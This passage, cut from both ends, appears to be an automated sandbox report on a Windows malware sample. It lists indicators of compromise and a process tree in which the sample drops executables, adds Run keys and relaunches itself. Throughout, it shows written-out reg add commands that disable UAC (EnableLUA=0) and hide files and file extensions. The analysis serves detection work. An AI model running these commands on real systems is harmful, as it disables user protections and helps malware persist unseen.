880	reg.exe
1900	reg.exe
1592	Process not Found
2116	Process not Found
816	reg.exe
2252	reg.exe
700	reg.exe
1372	reg.exe
2868	reg.exe
988	reg.exe
2876	reg.exe
2936	reg.exe
1476	reg.exe
1564	reg.exe
1488	reg.exe
832	Process not Found
1992	Process not Found
2752	reg.exe
568	reg.exe
1540	reg.exe
2776	reg.exe
2760	reg.exe
1884	reg.exe
2756	reg.exe
1904	reg.exe
2528	reg.exe
1600	Process not Found
1128	Process not Found
2488	reg.exe
2812	reg.exe
1520	reg.exe
560	reg.exe
2184	reg.exe
928	reg.exe
2996	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2132	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2132	581799237e8f5c3cecfedfb6b8aaeb7a.exe
564	581799237e8f5c3cecfedfb6b8aaeb7a.exe
564	581799237e8f5c3cecfedfb6b8aaeb7a.exe
1648	581799237e8f5c3cecfedfb6b8aaeb7a.exe
1648	581799237e8f5c3cecfedfb6b8aaeb7a.exe
1448	581799237e8f5c3cecfedfb6b8aaeb7a.exe
1448	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2476	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2476	581799237e8f5c3cecfedfb6b8aaeb7a.exe
768	581799237e8f5c3cecfedfb6b8aaeb7a.exe
768	581799237e8f5c3cecfedfb6b8aaeb7a.exe
1076	581799237e8f5c3cecfedfb6b8aaeb7a.exe
1076	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2404	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2404	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2372	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2372	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2224	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2224	581799237e8f5c3cecfedfb6b8aaeb7a.exe
1652	581799237e8f5c3cecfedfb6b8aaeb7a.exe
1652	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2904	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2904	581799237e8f5c3cecfedfb6b8aaeb7a.exe
3016	581799237e8f5c3cecfedfb6b8aaeb7a.exe
3016	581799237e8f5c3cecfedfb6b8aaeb7a.exe
1580	581799237e8f5c3cecfedfb6b8aaeb7a.exe
1580	581799237e8f5c3cecfedfb6b8aaeb7a.exe
700	581799237e8f5c3cecfedfb6b8aaeb7a.exe
700	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2860	conhost.exe
2860	conhost.exe
2176	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2176	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2948	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2948	581799237e8f5c3cecfedfb6b8aaeb7a.exe
1104	conhost.exe
1104	conhost.exe
2068	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2068	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2124	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2124	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2876	cmd.exe
2876	cmd.exe
2840	conhost.exe
2840	conhost.exe
2080	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2080	581799237e8f5c3cecfedfb6b8aaeb7a.exe
1900	581799237e8f5c3cecfedfb6b8aaeb7a.exe
1900	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2500	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2500	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2444	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2444	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2736	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2736	581799237e8f5c3cecfedfb6b8aaeb7a.exe
1924	581799237e8f5c3cecfedfb6b8aaeb7a.exe
1924	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2456	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2456	581799237e8f5c3cecfedfb6b8aaeb7a.exe
112	581799237e8f5c3cecfedfb6b8aaeb7a.exe
112	581799237e8f5c3cecfedfb6b8aaeb7a.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2996 wrote to memory of 2676	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	28
PID 2996 wrote to memory of 2676	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	28
PID 2996 wrote to memory of 2676	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	28
PID 2996 wrote to memory of 2676	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	28
PID 2996 wrote to memory of 2744	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	29
PID 2996 wrote to memory of 2744	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	29
PID 2996 wrote to memory of 2744	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	29
PID 2996 wrote to memory of 2744	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	29
PID 2996 wrote to memory of 2616	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	32
PID 2996 wrote to memory of 2616	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	32
PID 2996 wrote to memory of 2616	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	32
PID 2996 wrote to memory of 2616	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	32
PID 2616 wrote to memory of 2132	2616	cmd.exe	34
PID 2616 wrote to memory of 2132	2616	cmd.exe	34
PID 2616 wrote to memory of 2132	2616	cmd.exe	34
PID 2616 wrote to memory of 2132	2616	cmd.exe	34
PID 2996 wrote to memory of 320	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	33
PID 2996 wrote to memory of 320	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	33
PID 2996 wrote to memory of 320	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	33
PID 2996 wrote to memory of 320	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	33
PID 2996 wrote to memory of 2096	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	36
PID 2996 wrote to memory of 2096	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	36
PID 2996 wrote to memory of 2096	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	36
PID 2996 wrote to memory of 2096	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	36
PID 2996 wrote to memory of 2628	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	35
PID 2996 wrote to memory of 2628	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	35
PID 2996 wrote to memory of 2628	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	35
PID 2996 wrote to memory of 2628	2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe	35
PID 2132 wrote to memory of 1124	2132	581799237e8f5c3cecfedfb6b8aaeb7a.exe	41
PID 2132 wrote to memory of 1124	2132	581799237e8f5c3cecfedfb6b8aaeb7a.exe	41
PID 2132 wrote to memory of 1124	2132	581799237e8f5c3cecfedfb6b8aaeb7a.exe	41
PID 2132 wrote to memory of 1124	2132	581799237e8f5c3cecfedfb6b8aaeb7a.exe	41
PID 1124 wrote to memory of 564	1124	cmd.exe	50
PID 1124 wrote to memory of 564	1124	cmd.exe	50
PID 1124 wrote to memory of 564	1124	cmd.exe	50
PID 1124 wrote to memory of 564	1124	cmd.exe	50
PID 2132 wrote to memory of 2920	2132	Process not Found	47
PID 2132 wrote to memory of 2920	2132	Process not Found	47
PID 2132 wrote to memory of 2920	2132	Process not Found	47
PID 2132 wrote to memory of 2920	2132	Process not Found	47
PID 2132 wrote to memory of 2932	2132	Process not Found	46
PID 2132 wrote to memory of 2932	2132	Process not Found	46
PID 2132 wrote to memory of 2932	2132	Process not Found	46
PID 2132 wrote to memory of 2932	2132	Process not Found	46
PID 2132 wrote to memory of 2948	2132	Process not Found	124
PID 2132 wrote to memory of 2948	2132	Process not Found	124
PID 2132 wrote to memory of 2948	2132	Process not Found	124
PID 2132 wrote to memory of 2948	2132	Process not Found	124
PID 2132 wrote to memory of 2496	2132	Process not Found	49
PID 2132 wrote to memory of 2496	2132	Process not Found	49
PID 2132 wrote to memory of 2496	2132	Process not Found	49
PID 2132 wrote to memory of 2496	2132	Process not Found	49
PID 564 wrote to memory of 1984	564	581799237e8f5c3cecfedfb6b8aaeb7a.exe	51
PID 564 wrote to memory of 1984	564	581799237e8f5c3cecfedfb6b8aaeb7a.exe	51
PID 564 wrote to memory of 1984	564	581799237e8f5c3cecfedfb6b8aaeb7a.exe	51
PID 564 wrote to memory of 1984	564	581799237e8f5c3cecfedfb6b8aaeb7a.exe	51
PID 564 wrote to memory of 1760	564	581799237e8f5c3cecfedfb6b8aaeb7a.exe	52
PID 564 wrote to memory of 1760	564	581799237e8f5c3cecfedfb6b8aaeb7a.exe	52
PID 564 wrote to memory of 1760	564	581799237e8f5c3cecfedfb6b8aaeb7a.exe	52
PID 564 wrote to memory of 1760	564	581799237e8f5c3cecfedfb6b8aaeb7a.exe	52
PID 1984 wrote to memory of 1648	1984	cmd.exe	55
PID 1984 wrote to memory of 1648	1984	cmd.exe	55
PID 1984 wrote to memory of 1648	1984	cmd.exe	55
PID 1984 wrote to memory of 1648	1984	cmd.exe	55

System policy modification 1 TTPs 30 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
"C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2996
- C:\Users\Admin\JAQkskwo\tuYEoMQw.exe
  "C:\Users\Admin\JAQkskwo\tuYEoMQw.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:2676
- C:\ProgramData\EKkEgUww\daMIAQkU.exe
  "C:\ProgramData\EKkEgUww\daMIAQkU.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Drops file in Windows directory
  PID:2744
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2616
- - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
    C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2132
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1124
    - - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:564
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1648
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        8⤵
        
        PID:2908
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1448
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        10⤵
        
        PID:2060
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        10⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:2936
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        10⤵
        
        PID:2248
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        10⤵
        
        PID:904
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\MAQwIQEE.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        10⤵
        
        PID:2252
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        8⤵
        
        PID:1372
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        8⤵
        Modifies registry key
        
        PID:1784
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        8⤵
        
        PID:1556
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        6⤵
        
        PID:1760
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        6⤵
        Modifies registry key
        
        PID:2488
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        6⤵
        
        PID:2848
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\kmwgoQEE.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        6⤵
        
        PID:2952
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        7⤵
        
        PID:1932
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      PID:2948
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      PID:2932
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      Modifies visibility of file extensions in Explorer
      PID:2920
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\LywIIwYk.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
      4⤵
      PID:2496
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        5⤵
        
        PID:2800
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:320
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  - UAC bypass
  PID:2628
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:2096
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\DAcssAEg.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  PID:1600
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:2624

C:\ProgramData\AmkgkEAM\JSsssIQc.exe
C:\ProgramData\AmkgkEAM\JSsssIQc.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
PID:2884

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2476
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
  2⤵
  PID:400
- - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
    C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:768
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
      4⤵
      PID:3048
    - - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1076
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        6⤵
        
        PID:1152
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2404
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        8⤵
        Modifies registry key
        
        PID:2428
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        8⤵
        UAC bypass
        
        PID:2792
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        9⤵
        
        PID:1840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        8⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2696
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        9⤵
        
        PID:2076
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        8⤵
        
        PID:2160
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\fSsUUUoY.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        8⤵
        
        PID:2776
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        9⤵
        
        PID:2108
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        6⤵
        UAC bypass
        
        PID:2176
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        6⤵
        
        PID:892
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        6⤵
        Modifies visibility of file extensions in Explorer
        
        PID:328
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\ssQMQcQc.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        6⤵
        
        PID:2508
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        
        PID:1600
    - - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        5⤵
        
        PID:2064
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      UAC bypass
      PID:948
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      PID:920
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      PID:908
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\dUYQsIcA.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
      4⤵
      PID:2960
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:836
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies visibility of file extensions in Explorer
  PID:1808
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  - UAC bypass
  PID:1500
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\IaoMEwEE.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  PID:108

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2372
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
  2⤵
  PID:2024
- - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
    C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2224
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
      4⤵
      UAC bypass
      Checks whether UAC is enabled
      System policy modification
      PID:2948
    - - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1652
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        6⤵
        
        PID:1696
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2904
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        8⤵
        
        PID:2088
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3016
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        10⤵
        
        PID:2072
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
